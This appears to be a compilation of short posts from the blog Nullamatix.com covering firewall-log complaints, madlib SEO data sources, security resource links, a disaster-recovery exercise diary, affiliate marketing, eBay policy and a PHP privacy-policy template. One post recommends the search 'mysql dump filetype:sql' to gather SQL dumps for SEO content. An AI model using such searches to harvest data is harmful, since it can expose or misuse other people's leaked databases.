00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=5345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=6345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=7345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=8345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=1345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=2345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=3345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=4345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=5345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=6345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=7345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=8345    DPT=39172
00:02:19  SRC=68.1.81.23       DST=67.200.200.00    SPT=9345    DPT=39172

Are you fucking kidding me? I’ve been on the Internet for over 12 years and have never seen any shit like this, not anything that was considered legitimate traffic anyway. After bringing this to the attention of a few people I converse with, someone sent me this: http://www.internap.com/flash/fcp/fcp.swf

WTF is this, some kind of joke? Not sure if anyone put forth the thought toward considering this, but technology is advancing - getting better. The entire concept sounds like a big ass sales pitch, and if you think for one second the available capacity for the global infrastructure is anywhere near the maximum, you’re sadly mistaken.

Flow Control Platform

You do know there’s hardware capable of moving up to 400 million packets a second across 32, 10-Gb trunks, right? If your provider has “traffic congestion” problems, it’s time to reconsider.

Seriously, who on earth thinks sending traffic like this to not just my IP, but every intended destination IP on the Internet, is a good idea?

More From Nullamatix.com:

• January 2, 2008 -- How To Get Included In The Google Index In 48 Hours Or Less
• August 30, 2009 -- Whitelists Will Reign
• January 6, 2008 -- Wordpress Users, Beware - New Vulnerability Release
• October 25, 2009 -- Solved: Sprunge.us & Squid TCP_MISS/417

Post Originally Published at: Nullamatix.com - Technology Made Simple

Before posting Madlib Site PHP code examples demonstrating how to use the content you’ve obtained from: Free Data Sources for Blue Hat SEO’s Madlib Technique, I thought of a potentially interesting idea. Grep httpd server logs looking for Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), Blind SQL Injection, Remote Code Inclusion, and Remote Code Execution attempts, just for fun.

For now, the link is listed as a sub-menu item under “Tools & Stuff.” For anyone interested, check out all the action on our Server Logs page.

Stay tuned for another update this weekend; we’re going to build a Blue Hat SEO Madlib site.

More From Nullamatix.com:

• February 18, 2008 -- Need To Decrypt an md5 Hash? Try Some Free Rainbow Tables
• July 16, 2007 -- Starbucks Teams Up With T-Mobile To Charge Coffee Drinkers For WiFi
• January 30, 2008 -- 2 More Wordpress Plugin Exploits - Adserve & WassUp
• August 17, 2009 -- Howto: Windows XP/Server 2003 Null Route

Post Originally Published at: Nullamatix.com - Technology Made Simple

Government Data

Government data sources are great simply because the content is usually: accurate, concise, and there’s an abundance. For starters, bulk.resource.org makes the following available via http, rsync, BitTorrent, and ftp.

• • Commerce Business Daily
  • Public Safety Codes
  • Common Utilities
  • U.S. Copyright Database
  • The Judiciary
  • SEC EDGAR Database
  • General Accountability Office
  • Government Printing Office
  • Internal Revenue Service
  • National Technical Information Service
  • Patent Full Text Database
  • Robotic Guidance
  • Smithsonian Institution
  • Trademark Database

Wikidumps

Anyone looking to build a Madlib site probably already knows Wikipedia releases their entire database dumps to the public. Grab them here: http://meta.wikimedia.org/wiki/Data_dumps

GeoNames - Country Dumps

Geonames.org has a collection consisting of country related data. The usual: Latitude, Longitude, Elevation, Population, Timezone, Country Code, Capital, Area (in sq. km), Top Level Domain, etc. Start loading this into your Madlib arsenal if you’re looking to target the world :] http://download.geonames.org/export/dump/

The Obvious: Google

The advanced search operator filetype: is very handy for our situation. The query: mysql dump filetype:sql produced over 9,000 results at the time of writing. Get creative with this query and there’s no telling what you’ll come across. If you’re interested in csv data, try filetype:csv, instead. Prefixed with anything that comes to mind, Google will usually provide a generous heap of information. You’ll have to filter through some of the results to find the good stuff, but the effort will pay off in the long run.

Oddity Software

In addition to their non-free databases, Oddity Software’s generous collection of free data sets are another must-have for any madlibber. If you haven’t already, visit http://www.odditysoftware.com/free_lists.html to acquire an excellent base to start from, or make a strong addition to the archive :D.

myDataMaster.com

The generous collection at http://mydatamaster.com/free-downloads/ provides the following types of data dumps in sql/zip (available via http):

• US Street Suffixes and Abbreviations
• US State and Territory Abbreviations
• US Embassies
• Famous Birthdays
• Mixed Quotes
• World Cities and Languages
• Articles on various topics
• Medicare Coverage Details
• US Nursing Homes
• US Medical Suppliers
• Home Business Articles
• Database of Random Facts
• Education/College Articles
• Complete Bible Website

The next few posts will provide some examples (with code) to build a fully functioning madlib site with our new library. I’m not a professional coder, so don’t expect anything glamorous.

So, where do you get your data?

More From Nullamatix.com:

• July 25, 2007 -- Old School DDoS Attacks - How Large Servers Got Pwned
• February 27, 2008 -- Nullamatix Gets a Facelift, and There’s More on The Way
• December 18, 2007 -- Text Link Advertisments Yield Larger Returns
• November 28, 2007 -- Find r57 and c99 Shells Hidden Inside PHP and TXT Files

Post Originally Published at: Nullamatix.com - Technology Made Simple

First Up: Security

The Information Security Writers’ text library is easily one of the most valuable computer and network security resources on-line. Nine years have passed since the site’s launch and the abundance of available information seems priceless.

Remember the Sony Rootkit scandal?  How about the recently resurrected DNS Cache poisoning scare? Dan Kaminsky’s personal blog DoxPara.com is definitely a site worth subscribing to if you’re interested in staying ahead of the security game. What, no conficker propaganda? Don’t worry, Dan’s got your fix; check out what he recommends for conficker infection detection.

Pssst… your ports are showing. Not sure what to do about it? Consider hiring yourself a fwknop, aka the FireWall KNock OPerator. fwknop is a sentry daemon that supports Linux, bsd, and OS X systems. The Single Packet Authentication scheme can add another perimeter of defense to your networks. This clever project was released under the GNU Public License by Michael Rash at cipherdyne.org.

Just recently a site that appears to focus primarily on web application security (XSS, CSRF, CSS, Injections, etc) showed up in my rss feed reader. Now that I’ve thought about it, I’m not even sure when or how it was added…? Wow, guess that makes RSnake the real deal? Seriously though, if you’re into finding holes in web apps and other playgrounds often thought to be secure, head over to ha.ckers.org for some brain food. The papers, tools, and super secrets are hidden toward the bottom right.

Finally - Harden Your Stack. Nobody likes a soft stack.

Development

CodeDiesel.com is a fresh site that avoids publishing the usual PHP code floating around the net. Their posts typically cover a unique or innovative objective with clear, thorough details. For example, their latest post at the moment covers a free geolocation api tool. I definitely look forward to the updates this site produces.

Ever thought about deploying your own army of small, efficient web crawlers to index the Interwebs? Try crawl, a tiny but feature rich app designed with efficiency and simplicity in mind. Mr. Provos has an entire collection of interesting tools worth investigating.

Forget milk, gotAPI? gotAPI is a slick web-site that puts the ins-and-outs of PHP at your fingertips. You thought Google was awesome? Try your PHP code searches at gotAPI and start churning out some real code.

Linux Related

Shell-fu.org publishes an array of content that will prove beneficial to any command line buff. Ever run into a situation that demanded moving MySQL database tables between two remote hosts? Shell-fu.org tip #669 explains how with a single command. What about automating web related tasks with Lynx? Shell-fu.org tip #666 to the rescue. And they said 666 was the mark of the beast… I thought a Lynx was a cat??

Stuck with a ridiculously low maximum file-size attachment limit? No worries, TheGeekStuff.com explains how to compress, encrypt, split, and transport big files safely. How about vim? Still fumbling around trying to understand the purpose of insert mode? TheGeekStuff.com has a list 8 Essential Vim Navigation Fundamentals that will have you flying your way around vim in no time.

Did you know, according to HoneyD.org, 43% of spam originates from Linux systems?

Alright, I’ve barely touched the tip of the iceberg. There’s so much information out there and not enough time to consume it all. My goal is to continue publishing helpful information that may or may not already exist. Even after a solid year of inactivity, Nullamatix.com continues dominating Google’s search result pages for a wide spectrum of keywords, often showing up within the top 5 results for what I consider fairly important topics.

Anyway - what are some of your priceless resources? Feel free to share them by posting a comment.

More From Nullamatix.com:

• April 6, 2008 -- DR Exercise: Rebuilding The Enterprise - Days 1 & 2
• November 4, 2009 -- RIP: str0ke of milw0rm.com
• February 27, 2008 -- One of a Kind: The Multiline MD5 Hash Generator
• October 29, 2007 -- A: Why are Weblogs (blogs) Important and Should I Blog?

Post Originally Published at: Nullamatix.com - Technology Made Simple

Sunday, 14:36: Arrived at Recovery Site

The first step was to establish power. To accomplish this, two massive diesel powered generators were used. Bertha, as everyone referred to the main generator, was responsible for providing power to the server room, customer service center, network operations center, Internet cafe, application development area, and sleeping quarters. Bertha was online and running strong within hours of our arrival, so power wasn’t really an issue. Cables were ran where power was needed, and the air conditioning unit for the server room was up and running in no time.

With power and ice cold air conditioning in the server room, my team’s next objective was to start setting up the customer service center. We arranged two tables and ran a source of power to begin work on our first service request; scan all workstations for viruses prior to connecting to the network. To accomplish this, we used a variety of virus definitions slipstreamed into a live CD. The longest scan took over two hours, and we worked through dinner to ensure all workstations were clean. Thankfully, no threats were detected and we finished shortly after 20:00. After building a primitive task list in an effort to maintain some sort of service request organization, I took a shower and was able to lay down for some well deserved sleep around 23:00.

Monday, 05:30: Begin Day 2

After eating a much needed hot breakfast, day two was quickly underway at 06:30. The network infrastructure, security, and disaster preparedness teams worked hard the previous day to get the satellites up and running. With a total of six satellites independently capable of 2 megabits down and 1 megabit up, they were able to aggregate the bandwidth to one central gateway for optimum efficiency. This provided speeds of up to 12 megabits down, and 6 megabits up, which isn’t bad considering we were stuck somewhere in the middle of no where.

Today’s primary objective was to establish internal phone communications, and begin server restoration from back-up tapes. The telephone operations portion of the network team had phones up and running to all major areas of camp by 10:00. Around 14:00, the server team arrived and began working the remainder of the afternoon and long into the night recovering mission critical services. Based on my observations, restoring the parent and child domains for active directory, and getting the two to communicate properly gave them the most trouble. We were without active directory for over 36 hours, so authenticating to damn near everything was impossible during that time. Meanwhile, email, web, and database recovery were all taking place slowly but surely.

While all that chaos was taking place, the customer service center was continuously bombarded with an assortment of miscellaneous requests. Laptops that hadn’t been scanned the day before, random tests from the telco team (can you hear me now?), troubleshooting wireless connectivity issues, operating system restorations, software installations, printer installations, security watch, and dozens of other requests. Since the service center was comprised of only two people for this exercise, the work load was pretty intense, especially since a lot of the work required one (sometimes both) of us to leave our area.

Day 2 Finally Comes to an End

There’s no way to effectively convey in writing the hell endured during the first two days of the exercise. Traditional methods of operation went out the door as we came up with innovative ways to deal with issues as they arose. Standard operating procedures were replaced with creative problem solving and thinking outside of the box. I found myself still working with the server team after midnight trying to learn and provide aid in any way possible. After a short lived hot shower, 05:30 was only a couple hours away, and I eventually went to sleep thinking day three would be a little easier. Oh how wrong I was. Stay tuned for day 3 and possible day 4 tomorrow.

More From Nullamatix.com:

• December 9, 2007 -- Fox News Debates The Quality of Sex With Young Boys
• November 16, 2007 -- 3 Ways to Avoid Drama At The Workplace
• December 19, 2007 -- Part 1: A Guide To Blogging For Profit
• October 23, 2009 -- GoDaddy: Express Written Objection to Transfer

Post Originally Published at: Nullamatix.com - Technology Made Simple

The Policy is Already in Effect

Despite the date provided in the announcement (March 31st, 2008), a number of sellers are saying their auctions have already been removed. A Powerseller that claims to sell over $20,000 a month in physical product started a thread that’s already reached 138 posts (at the time of writing) in just over a day. Just to sum up the seller’s dilemma, they provide product information ebooks for $1, which is refunded whenever the product mentioned in the ebook is purchased. The power seller continues to explain the situation,

What our representative told us is that it seems that eBay will soon be coming out with a new policy that prohibits the sale of electronically delivered products (like ebooks). The policy has not been announced and the eBay customer service representatives have received no notification about the “new” policy. It is an unannounced policy that sellers will learn about “sometime in the near future” and my rep said it is “rather unusual” for eBay to take action (like removal of listings) prior to a policy actually be announced.

So, my ebooks were removed and I was issued a violation warning (which I was told that the warning will be removed from my record — snicker, snicker… like I really can “trust” eBay Trust & Safety to keep their word) for a policy that has not yet been announced.

And it’s Not Just eBooks

The new policy applies to anything that’s digitally delivered, for example:

• Digital Audio: mp3s, podcasts, audio books, etc.
• Digital Videos: xvids, flvs, divx, wmv, etc
• Websites: no more site flipping on eBay
• Domain Names: these don’t have any value, do they?
• Graphic Design Services: your services are worthless
• Photo Services: so are yours
• Any product or service delivered electronically

Don’t Start Job Hunting Just Yet

This morning I received an email from my mom (thanks ma) containing a helpful link. John Thornhill of PlanetSMS Blog proposed a solid solution to this new policy problem. Just put your digital crap on CD’s, and ship ‘em - how easy is that? John also points out several reasons why this will work to a seller’s advantage, so check out the post for more info.

Since this new policy totally ruins my plan for world domination, perhaps I’ll reveal how I managed to earn $34.35 (minus $1.30 in fees) with only ten minutes of extremely painful clicking and typing (/sarcasm). Show some interest in the comments or just stay tuned.

More From Nullamatix.com:

• November 5, 2007 -- The Acacia Strain - December 2nd, 2007 - Jacksonville, FL.
• January 15, 2008 -- Make Money With a Poor Mans BANS (Build a Niche Store)
• December 30, 2007 -- New and Upcoming - The Latest Projects
• October 23, 2009 -- GoDaddy: Express Written Objection to Transfer

Post Originally Published at: Nullamatix.com - Technology Made Simple

The veteran Nullamatix readers probably already know I prefer minimalism over aesthetics any day, but feel free to take a look at the attached screenshot taken a couple months ago to see what I’m referring to. Further analysis lead me to conclude most of the Firefox tabs were for web based tools - nice. So I started thinking, “how about a little consolidation to render this problem obsolete?” After dedicating nearly fifteen consecutive hours to mine and my family’s future (I’m a computer nerd, I’m a computer nerd), it was time to end the day and get some rest.

Shortly after waking up and fixing a pot of coffee, I started working on a Tools page, which is now listed in the top navigation menu. Anytime I come across a new and helpful tool, I’ll add it to the list. The purpose, needless to say, is to provide an organized and consolidated list of useful tools for web developers, Internet marketers, and network/security specialists. The list is pretty short at the moment, but trust me, there’s a lot more on the way. I guess the purpose of this post is to announce the addition and provide readers an opportunity to showcase their tools. If you have any useful web based tools you’d like to recommend for inclusion either shoot me an email or leave a comment.

Until next time, back to the grind.

More From Nullamatix.com:

• November 15, 2007 -- Thanksgiving Deals, Discounts, and Sales - Black Friday 2007 Tips and Info
• November 14, 2007 -- Heavy Metal Band “Dawn of Tears” Offers Free Album
• November 10, 2007 -- 5 Ways to Harden and Improve Security in Windows XP
• December 30, 2007 -- New and Upcoming - The Latest Projects

Post Originally Published at: Nullamatix.com - Technology Made Simple

Stop Buying & Reading E-Books

Of the 1,000+ E-books I own (no, they weren’t all purchased), I’d say 2 of the 300+ I’ve read have actually provided valuable information that isn’t reproduced a million times all over the web. I’m not saying all ebooks are worthless, they’re excellent for absolute beginners, but none of the eBooks I’ve read provide a clear cut guide to making money as an affiliate with pay per click advertising. There is no end all be all step by step guide to turning a profit - if there is, please prove me wrong. I suspect this is because once an affiliate marketer does turn a profit, the last thing they want to do is divulge their secrets/methods, which is understandable.

If you already have a basic idea of how affiliate marketing works, rather than wasting time buying and reading ebooks, just dive in and get started. Login to Adwords and make a few campaigns. Set the daily budget to something you can afford and see what happens. If you end up blowing $50 on on 1,000 clicks and don’t receive a single conversion, chances are that program/method/technique isn’t going to work. Study the stats to figure out what went wrong and try again. Bottom line, stop wasting your money on Ebooks to make some other guy rich and start wasting your money on Adwords to make YOU rich.

Affiliate Marketers Are Not Your Friends

Affiliate marketing elites are very reluctant to give out any worth while information. Even the successful ones making $10,000 a day are so greedy they’d rather steer people in the wrong direction than help someone make their first conversion. I probably shouldn’t say the following because I don’t make $10,000/day (yet), but I can assure you if someone took the time to email me an educated question, I’d damn sure help them out the best I could. If I’m able to live on the $150-$200 a day I’m making now, I could damn sure take thirty minutes out of my $10,000 days to help someone struggling just to get a single conversion. Unfortunately, the affiliate marketing business is rough, so don’t expect Shoemoney or any of the other big guys to divulge any helpful information. Just to give you an idea of what I’ve been through, here are some of the responses I’ve received.

“What are you on, crack? I’ve wasted five years of my life at this, no way I’m helping you! Figure it out douche bag.”

“You’re joking, right? You really expect me to help you? Good luck moron.”

“Um, no.”

Not really encouraging, is it? These were the responses I received from what I thought were well written questions. None of my questions involved revealing keywords or landing pages, but even so, if you’re making $10,000/day, would it really hurt to reveal one of your landing pages to a small time affiliate noob? Doubtful…

Affiliate Marketing as a Day Job

After playing with Adwords I’ve come to the conclusion affiliate marketing is not only a game, but a fun game. I could easily work 8 hour days creating campaigns, tweaking, testing, and optimizing. Despite losing money, the knowledge and experience gained is truly priceless - something an ebook could never provide. I’ll continue my efforts in hopes that one day my “day job” does become affiliate marketing.

“Get Out There and HIT SOMEBODY!”

Every game, no matter how many people I hit, my football coach would call me to the sideline every couple plays and yell, “Get out there and HIT SOMEBODY!” To this day I’m not sure why he did that and I often find myself reliving those moments. His face pressed up against my face mask just yelling at me to get out there and hit somebody, as if I hadn’t taken out two people already.

There’s no telling what that guy’s up to now, but the point is, that statement applies to almost anything in life. Rather than waiting for an opportunity, create an opportunity. Don’t sit around expecting someone to hand you the master plan, get out there and make the master plan. Sure, there’s no sense in reinventing the wheel, but if no one’s willing to give you blueprint, what choice do you have? If you haven’t already, sign up for Adwords, sign up with CPAEmpire, Azoogle, or Neverblue ads, and GET OUT THERE AND HIT SOMEBODY.

More From Nullamatix.com:

• December 15, 2007 -- The iCache Might Replace Your Credit Cards
• December 30, 2007 -- New and Upcoming - The Latest Projects
• December 13, 2007 -- Q: Is The Lack Of Sound Quality Worth The Risk?
• April 24, 2009 -- Flow Control Platform (FCP) is Pissing Me Off

Post Originally Published at: Nullamatix.com - Technology Made Simple

“We are excited to announce eBay’s new global affiliate platform: the eBay Partner Network. The new platform will go live on April 1st, 2008 PST, at which point eBay will no longer be running its affiliate program through Commission Junction. Beginning April 1st, affiliates should register with eBay Partner Network and migrate their links from CJ to the new platform. While CJ and ValueClick have been valuable partners to eBay throughout the years, we’ve decided to give our affiliate community a customized experience for eBay affiliates.”

New eBay Affiliate Benefits

To read the official eBay press release, go here. Well, this upset me to no end. All my Poor Mans BANS will go defunct on April 1st. Is this some kind of pre-April fools joke? Unfortunately, this looks like the real deal. However, there are some positive perks coming with the new eBay affiliate network. Once the network goes live, eBay affiliates will be able to receive credit for global registrations from multiple countries. You get some kid in Trinidad to sign up, $25 for you. Ok, well, maybe I’m dreaming here, but I guess we’ll just have to wait and see.

Get Started Now

So for all your Poor Mans BANS users out there, goto eBay’s affiliate site, sign-up, and start rebuilding your RSS feeds. Hopefully I’ll be able to release an automated way of carrying out the transition (I’d have to update over 300 feeds by hand if not), but since my day job is forcing me to go play in the woods for a week, that may not happen in time. I’ll pay one of your crafty php developers out there to come up with something (Patrick? Congrats on the promosh by the way).

Eggs In One Basket…

I’ve always known having more than one stream of revenue is beneficial to any on-line marketer’s success. Vic from Blogger Unleashed would agree; perhaps he isn’t so crazy after all. Vic recently published a Vlog about why diversified income is so important, and although he speaks like he’s your father doped up on pain and anti-psychotic meds, he does have a method to his madness. If the Poor Mans BANS is all you’re investing time in, take additional steps to create Adsense sites, lead generation sites, product review sites, etc, etc. Diversify your income - bottom line.

Poor Mans BANS Goes BIG

Sam submitted a comment yesterday telling me his Drupal version of a Poor Mans BANS was in the USA Today. Sam mentioned the article only brought 30 visits, but I’m sure that link looks damn good to Google. Here’s the USA Today article, and here’s Sam’s Poor Mans BANS. Oh, and by the way, Sam. Thanks for mentioning Nullamatix in all your fame and glory Just Teasing! Congrats dood, that’s awesome! I wish you more success in the future.

More From Nullamatix.com:

• January 2, 2008 -- Nullamatix Visitors Are Major Geeks
• February 24, 2008 -- TNX.Net - A Helpful Resource, or Potential For Disaster?
• July 25, 2007 -- Web Based Operating System The Furture Of Computing
• November 5, 2007 -- Microsft’s Windows Continuously Increasing Startup Time: Causes and Fixes

Post Originally Published at: Nullamatix.com - Technology Made Simple

Fewer Servers and Faster Distribution

Frank Gombalt, a member of the University’s IT staff, stated,

“The university now uses 20 servers less than before, those servers were placed decentralized to send data to the desktops and to spare the WAN-connections.”

Here are the numbers comparing the before and after:

Before:

20 servers

25.6 terabytes

4 day completion time

After:

2 centralized SMS2003 servers

25.6 terabytes

Under 4 hour completion time

Who in their right mind would argue with those drastic improvements? Less hardware and power consumption mean more money - and saving money something any company is interested in pursuing. For rapid internal file distribution across an enterprise, BitTorrent is a method worth implementing. Does your company or organization use BitTorrent for internal file distribution? If so, please share how the technology presented, approved, and implemented.

More From Nullamatix.com:

• November 26, 2007 -- Stop Using Facebook and MySpace or Stop Complaining
• December 12, 2007 -- Nullamatix.com Survived The Digg Effect, Barely
• November 28, 2007 -- Find r57 and c99 Shells Hidden Inside PHP and TXT Files
• December 31, 2007 -- Updates and a Happy New Year

Post Originally Published at: Nullamatix.com - Technology Made Simple

The Features Seem Endless

• The setup wizard makes installation a breeze
• No programming, plug-ins, or graphic skills necessary
• Superior inventory control, sales tracking, and over 50 available themes
• Capable of accepting credit cards (real time), Google checkout, and more
• Calculates shipping cost in real time
• Search engine optimized with clean URLs, meta tags, and auto sitemap generation
• Sales statistics/trends, affiliate capable, and sms alerts

Seriously, I could go on and on about what this shopping cart software is capable of, but why bother when they offer a live front-end and back-end demo? After seeing what Ashop’s shopping cart software had to offer, I felt compelled to share this information with you. There are no affiliate links, just a solid recommendation worth looking into if you’re thinking about getting into the Ecommerce business. From here, all you need is some product, server space, a domain, and you’re golden. And according to their web-site, they offer all that, too!

More From Nullamatix.com:

• November 15, 2007 -- Thanksgiving Deals, Discounts, and Sales - Black Friday 2007 Tips and Info
• November 2, 2007 -- Maddox Strikes Again: This Time Crocs’ Stock Falls Hard
• July 25, 2007 -- Comcast For The Win - Power Cycling Your Cable Modem Is Useless
• April 19, 2009 -- I Have Candy, Get in The Van.

Post Originally Published at: Nullamatix.com - Technology Made Simple

A Simple Text Ad Example

For this mock campaign we’re going to promote an ebook that provides parental guidance for potty training. I know, it’s silly, but you’ll get the idea.

Headline: Trouble Potty Training?

Description: Potty Train The Smarter Way!

Description: Try Our Effective Method Today

Display URL: ThePottySite.com

Destination URL: Your-Affiliate-Link.com

That takes care of understanding the customer’s needs, offering a solution, and providing a call to action. At this point, you might want to consider turning off the content network to avoid sifting through thousands of Made For Adsense sites. Based on my experience, search traffic performs better anyway.

The Tricky Part - Keywords

Here’s the real value of this post. Rather than bidding on hundreds or thousands of keywords, select 3 to 5 highly targeted phrases that will show your ad to only money spending prospects actively seeking a product or solution.

parent’s guide for potty training

[parent's guide for potty training]

“parent’s guide for potty training”

how to give potty training lessons

[how to give potty training lessons]

“how to give potty training lessons”

help with potty training my child

[help with potty training my child]

“help with potty training my child”

This will of course involve some minor testing and tweaking on your part, but I suggest setting up different ads with totally different base keyword sets. Stick with the broad, phrase, and exact matches for just 3-5 keywords and let your ads ride. To start off, try working with a $5 maximum daily budget and never bid more than $0.30 per click.

Click the screen shot on the left to see what these type of campaigns are capable of. You’ll obviously have a better shot at landing in the top 3 in an unsaturated niche, so keep that in mind while coming up with your product, ad, and keyword selection. Also, avoid the “get paid to drive” type offers. Adwords wants a minimum bid of $10 per click in order to become active for search, unless you’re able to come up with a set of different, yet totally relevant keywords. Good luck - feel free to share you experiences below.

More From Nullamatix.com:

• November 28, 2007 -- Find r57 and c99 Shells Hidden Inside PHP and TXT Files
• October 30, 2007 -- Get With The Program: Take Advantage of RSS Feeds If You Don’t Already
• December 14, 2007 -- Phrases You Shouldn’t Say Unless You Really Mean Them
• November 15, 2007 -- Leaked: Standard Operating Procedures for Camp Delta

Post Originally Published at: Nullamatix.com - Technology Made Simple

Here’s an excerpt from this page:

We’ve also added some specific privacy policy requirements that make it necessary for publishers to post and abide by a transparent privacy policy for their users. According to this policy, publishers must notify their users of the use of cookies and/or web beacons to collect data in the ad serving process.

Thanks to Jen from Jensense, all my web-sites now have a privacy policy that complies with the new Google Adsense Terms and Conditions; however, if you’re responsible for multiple sites, implementing this policy could potentially take hours. Well today’s your lucky day because I took her basic policy and added some minor php tweeks to semi-automate the implementation process. This little bit of PHP wizardry drastically cut down on the amount of time I would have spent manually implementing the policy for each web-site.

<?php echo substr($_SERVER['SERVER_NAME'], 4); ?> Privacy Policy

he privacy of <?php echo substr($_SERVER['SERVER_NAME'], 4); ?> visitors is important to us. At
<?php echo substr($_SERVER['SERVER_NAME'], 4); ?>, we recognize that the privacy of our
visitor’s personal information is important. Here is
information on what types of personal information we receive and
collect when you visit <?php echo substr($_SERVER['SERVER_NAME'], 4); ?>, and how we safeguard your
information. We never sell your personal information to third
parties.

Log Files

We collect and use the data contained in log files. The
information in the log files include your IP (internet protocol)
address, your ISP (internet service provider, such as AOL or Shaw
Cable), the browser used to visit our site (such as Internet
Explorer or Firefox), the time you visited our site and which
pages you visited within our site.

Cookies and Web Beacons

We do use cookies to store information, such as your personal
preferences when you visit our site. This could include only
showing you a popup once in your visit, or the ability to login
to some of our features, such as forums.

Third Party Advertisements

We also use third party advertisements on <?php echo substr($_SERVER['SERVER_NAME'], 4); ?> to
support our site. Some of these advertisers may use technology
such as cookies and web beacons when they advertise on our site,
which will also send these advertisers (such as Google through
the Google AdSense program) information including your IP
address, your ISP , the browser you used to visit our site, and
in some cases, whether you have Flash installed. This is
generally used for geotargeting purposes (showing New York real
estate ads to someone in New York, for example) or showing
certain ads based on specific sites visited (such as showing
cooking ads to someone who frequents cooking sites).

You can choose to disable or selectively turn off our cookies
or third-party cookies in your browser settings, or by managing
preferences in programs such as Norton Internet Security;
however, this can affect how you are able to interact with our
site as well as other websites. This could include the inability
to login to services or programs, such as logging into forums or
accounts.

<a href="/" title="Return To <?php echo substr($_SERVER['SERVER_NAME'], 4); ?> Home">Return To <?php echo substr($_SERVER['SERVER_NAME'], 4); ?> Main Index</a>

And there you have it. A customized, site specific privacy policy. From here, save the file as whatever.php, then drop a link to your new privacy policy. You could take this a step further and use PHP’s include function to drop this right into your site’s template.

This script assumes your site defaults to http://www.yourdomain.com, rather than http://yourdomain.com. If you’ve configured your site to not use www, you’ll need to replace every occurrence of,

<?php echo substr($_SERVER['SERVER_NAME'], 4); ?>

With,

<?php echo $_SERVER['SERVER_NAME']; ?>

Failure to do so will result in displaying domainXYZ.com, instead of yourdomainXYZ.com. Questions? Comments? Give me a shout below. If you’d like to keep up with Nullamatix, consider subscribing (top of the sidebar) via email to have posts delivered directly to your inbox, or add our full RSS feed to your favorite RSS reader.

More From Nullamatix.com:

• November 16, 2007 -- Instant Messaging is Producing a Generation of Cowards
• January 30, 2008 -- Secure Your Wordpress Admin Folder With lighttpd
• February 24, 2008 -- TNX.Net - A Helpful Resource, or Potential For Disaster?
• December 14, 2007 -- Nullamatix.com Gets Several Enhancements

Post Originally Published at: Nullamatix.com - Technology Made Simple

I’m not one to brag about achievements (mainly because I don’t have much to brag about), but the recent trend among bloggers in the blogosphere seem to involve publishing a post displaying various statistics. This probably won’t become a reoccurring or regular thing, but at the moment, it does seem like a great way to give out some link love, and express thanks to my visitors.

Visitors, Pageviews Numbers

• 11,145 Unique Visitors - 88% Were New Visitors
• 41,865 Pageviews - Average of 2.15 Pages per Visit
• 219,086 Hits
• 3.65 Gigabytes of Bandwidth. - 2:15 Average Time on Site
• 917 Directs (Bookmarks, No Referrals)

Top 5 Referring Sites

• SiteHoppin.com (118 Uniques) - Browser-Within-Browser Site Discovery Tool
• Digg (82 Uniques) - User Driven Content
• EntreCard (74 Uniques) - The Internet Business Card
• PowerDropping.com (45 Uniques) - EntreCard Power Dropping
• JimmyR (25 Uniques) - Web 2.0 Mashup

Top 5 Referring Search Engines

• Google - 2,808 Uniques
• Google Images - 216 Uniques
• Windows Live - 41 Uniques
• Yahoo - 31 Uniques
• AOL - 13 Uniques

The Earnings (Revenue)

• Commission Junction - $195
• Google Adsense - $126.72
• Paypal Payments - $50
• Money Spent on Advertising: $31
• Grand Total: $340 (net earnings)

That seems to cover the majority of what people are interested in seeing. If you ask me, the numbers just don’t add up, but who can argue with Google’s Analytics? So far, March is looking really promising. Since landing on the top of Shoemoney’s Top Commentators plugin, he’s sent me an ass load of cell phone comment spammers, and 4 unique visitors, none of which were new comers.

You might be wondering how I know all the cell phone comment spam is coming from Shoemoney (the referrers are often blocked on these comment bots), but the truth is, I don’t know for sure. This claim is based explicitly on the coincidence that the very same day I started showing up on his top commentators list, my spam comments went from the usual,

“nice post!”

and

“very good! I like your site in google searchs.”

to,

“GET 60,000 RINGTONEZ FOR J00R TMOBILEZ ELITEZ PHONEH0H0 BY VISTIN: http://some.garbage.co.uk/?eat-me.affiliate=12223391 THEY AM FREE FOR YOU NEW PHONE, GO NO!!! G0G0G0G0!!!one111eleven!!!”

The comments haven’t stopped, and before you ask, no, I don’t use Akismet. I’m temped to just blacklist ringtones, ring tones, cell phone, cellphones, etc. Just take the keywords from my PPC campaigns and dump ‘em into the Nullamatix comment keyword blacklist. Don’t get me wrong (Jeremy, if you read this), I’m sure the human traffic I receive from Shoemoney will outweigh the amount of cell phone spam (66 and counting), but so far it’s not looking good. And again, as I mentioned, I have no way of proving the spam is coming from Jeremy’s blog, unless anyone has any tips or suggestions?

Some Other Misc Stuff

The Webmaster Journal recently asked me a series of questions and posted them up on their web-site. Click here to check out Webmaster Journal’s question an answer session with yours truly.

Dan from PowerDosh.com implemented full RSS feeds as a result of the remarks in my previous post, 5 ‘Make Money Online’ Blogs Worth Subscribing To. Since the announcement he’s only posted one entry, but I’m sure there are more to come.

Jason from The University Kid is holding a huge online contest, probably the largest I’ve ever seen. After reading the post, I decided to offer 750 EntreCard credits to give away (contribute) in the contest. A comment and a GChat session later, absolutely no response - to either. 30 to 40 minutes after offering the credits via GChat, he changed his status and signed off (or blocked me). I doubt Jason cares, but considering I’ve done business with this guy in the past, I just wasn’t thrilled by his behavior, or lack of for this matter. At least have the guts to say, “No, thanks.”

Finally, some link love goes out to Our Blog Review for reviewing Nullamatix.com. Thanks guys!

I know this post was a little out of the norm, so expect some more technical stuff in the very near future. If you have any questions about anything in the post, don’t hesitate to leave a comment.

More From Nullamatix.com:

• March 18, 2008 -- eBay is Leaving Commission Junction - Poor Mans BANS Updates Required
